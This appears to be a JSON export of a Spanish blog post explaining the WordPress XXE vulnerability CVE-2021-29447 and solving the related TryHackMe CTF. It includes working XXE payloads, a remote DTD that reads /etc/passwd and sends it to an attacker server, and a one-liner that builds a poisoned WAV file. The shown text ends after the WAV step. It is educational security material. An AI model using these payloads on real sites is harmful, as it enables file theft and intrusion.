{"id":870,"date":"2021-09-04T01:03:24","date_gmt":"2021-09-03T23:03:24","guid":{"rendered":"https:\/\/www.pinguytaz.net\/?p=870"},"modified":"2021-09-04T01:03:25","modified_gmt":"2021-09-03T23:03:25","slug":"cve-2021-29447-vulnerabilidad-xxe-wordpress-ctf","status":"publish","type":"post","link":"https:\/\/www.pinguytaz.net\/index.php\/2021\/09\/04\/cve-2021-29447-vulnerabilidad-xxe-wordpress-ctf\/","title":{"rendered":"CVE-2021-29447 Vulnerabilidad XXE WordPress (CTF)"},"content":{"rendered":"\n

Esta vulnerabilidad registrada en el CERT<\/a> en Abril, afecta a los WordPress anteriores al 5.7.1 y aprovecha el fallo de seguridad de inyecci\u00f3n externa XML en los archivos multimedia.<\/p>\n\n\n\n

En este POST describiremos esta vulnerabilidad y como reproducirla, resolviendo la CTF de TryHackme \u00abWordPress: CVE-2021-29447<\/a>\u00bb la cual cuenta tambi\u00e9n un resumen de la vulnerabilidad.<\/p>\n\n\n\n

Decripci\u00f3n CVE-2021-29447<\/h2>\n\n\n\n

La vulnerabilidad nos permite el acceso de archivos internos, mediante un ataque XEE de tipo SSRF (Falsificaci\u00f3n de solicitud desde el lado del servidor) que nos permite extraer informaci\u00f3n, poniendo en peligro la confidencialidad del sistema y la obtenci\u00f3n de datos para ataques mayores como se comprobara durante el ataque a la CTF de TryHackme<\/a>. <\/p>\n\n\n\n

Esta catalogada de grado media, ya que necesitaremos de un usuario y clave que nos permita cargar un archivo multimedia con una carga \u00fatil que nos permita el acceso a los archivos internos, en WordPress el archivo wp-config.php<\/em> nos pondr\u00eda en peligro el sistema por la informaci\u00f3n que contiene este.<\/p>\n\n\n\n

Ataque XXE<\/h2>\n\n\n\n

Un ataque XXE (XML External Entity) es una inyecci\u00f3n de c\u00f3digo en una aplicaci\u00f3n que analiza datos XML. En el caso que nos ocupa basta con introducir un archivo multimedia, un WAV por ejemplo, con informaci\u00f3n en XML que solicita un acceso URI que permite acceder a ficheros del sistema obteniendo de esta forma informaci\u00f3n de inter\u00e9s.<\/p>\n\n\n\n

As\u00ed que bastar\u00eda por ejemplo introducir las siguientes lineas XML en nuestro archivo multimedia para que esta recoja informaci\u00f3n del fichero de password.<\/p>\n\n\n\n

\n
\n
<!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http:\/\/IP:PUERTO\/Payload.dtd'>%remote;%init;%trick;]><\/code><\/pre>\n<\/div>\n<\/div>\n\n\n\n
Esto solicita una DTD (Payload.dtd) a nuestra maquina atacante la cual tendr\u00e1 la carga util que solicitara la informaci\u00f3n del fichero de claves.<\/p>\n\n\n\n
\n
\n
\/\/ Lee el fichero \/etc\/passwd\n<!E<\/a>NTITY % file SYSTEM \"php:\/\/filter\/zlib.deflate\/read=convert.base64-encode\/resource=\/etc\/passwd\">\n\/\/  Enviamos el contenido a nuestro servidor\n<!ENTITY % init \"<!ENTITY % trick SYSTEM 'http:\/\/YOURSERVERIP:PORT\/?p=%file;'>\" ><\/code><\/pre>\n\n\n\n
Resoluci\u00f3n CTF TryaHackMe CVE-2021-29447<\/h2>\n\n\n\n
Una vez tenemos arrancada la maquina con la CTF \u00abWordPress: CVE-2021-29447<\/a>\u00bb y procedemos a realizar primero una enumeraci\u00f3n de puertos, con nmap por ejemplo, localizando:<\/p>\n\n\n\n
22\/tcp open ssh
80\/tcp open http
3306\/tcp open mysql<\/p>\n\n\n\n
Nos interesa en este primer momento el 80 que es donde tenemos instalado el WordPress, aunque los verificamos as\u00ed como la versi\u00f3n de este para confirmar que puede ser atacado con esta vulnerabilidad.<\/p>\n\n\n\n
whatweb http:\/\/IP_MaquinaVictima<\/code><\/pre>\n\n\n\n
\"\"
Resultado whatweb<\/figcaption><\/figure>\n<\/div>\n<\/div>\n\n\n\n
Vemos que es una versi\u00f3n inferior a 5.7.1 por lo tanto ejecutaremos esta vulnerabilidad, para esto deberemos tener acceso a cargar fichero multimedia, en nuestro caso tenemos un usuario y clave (test-corp \/ test) que nos da la CTF <\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
Verificamos si este tiene acceso a cargar archivos multimedia, entrando en la parte administrativa \u00abhttp:IP\/wp-admin\u00bb y vamos a \u00abMedia\u00bb comprobando que si podemos cargar archivos multimedia.<\/p>\n\n\n\n
<\/p>\n\n\n\n
Lo primero sera crear un archivo WAV con la solicitud al DTD de nuestra maquina de ataque, junto al DTD de payload que solicitara el archivo \u00ab\/etc\/passwd\u00bb en un primer momento para confirmar la vulnerabilidad.<\/p>\n\n\n\n
Creando WAV envenenado<\/h2>\n\n\n\n
\n
\n
echo -en 'RIFF\\x85\\x00\\x00\\x00WAVEiXML\\x79\\x00\\x00\\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '\"'\"'http:\/\/IP_ATACANTE:PUERTO\/MiEvil.dtd'\"'\"'>%remote;%init;%trick;]>\\x00' > mipayload.wav<\/strong><\/code><\/pre>\n<\/div>\n<\/div>\n\n\n\n
Formato del archivo WAV que creamos<\/p>\n\n\n\n